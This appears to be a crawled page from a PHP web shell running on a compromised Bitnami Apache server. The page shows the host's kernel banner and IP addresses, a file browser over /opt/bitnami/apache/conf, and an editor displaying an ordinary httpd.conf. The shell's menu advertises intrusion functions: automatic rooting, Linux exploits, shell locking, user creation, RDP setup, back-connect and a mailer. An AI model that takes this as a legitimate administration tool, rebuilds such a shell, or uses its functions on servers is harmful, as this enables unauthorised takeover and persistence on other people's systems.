Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
conf /
bitnami /
[ HOME SHELL ]
Name
Size
Permission
Action
certs
[ DIR ]
drwxr-xr-x
memory
[ DIR ]
drwxrwxr-x
bitnami-ssl.conf
1.5
KB
-rw-r--r--
bitnami-ssl.conf.back.20250123...
948
B
-rw-rw-r--
bitnami.conf
1.37
KB
-rw-r--r--
bitnami.conf.back.202501231019
469
B
-rw-rw-r--
httpd.conf
700
B
-rw-rw-r--
php-fpm.conf
292
B
-rw-r--r--
phpmyadmin.conf
406
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : httpd.conf
# Bitnami memory configuration for Apache # # Note: This will be modified on server size changes <IfModule mpm_prefork_module> StartServers 5 MinSpareServers 5 MaxSpareServers 10 MaxRequestWorkers 5 MaxConnectionsPerChild 5000 KeepAliveTimeout 1 </IfModule> <IfModule mpm_event_module> ServerLimit 4 StartServers 2 MinSpareThreads 128 MaxSpareThreads 192 ThreadsPerChild 64 MaxRequestWorkers 256 MaxConnectionsPerChild 5000 KeepAliveTimeout 2 </IfModule> <IfModule mod_passenger.c> PassengerMinInstances 1 # PassengerMaxInstancesPerApp 1 PassengerMaxPoolSize 3 </IfModule>
Close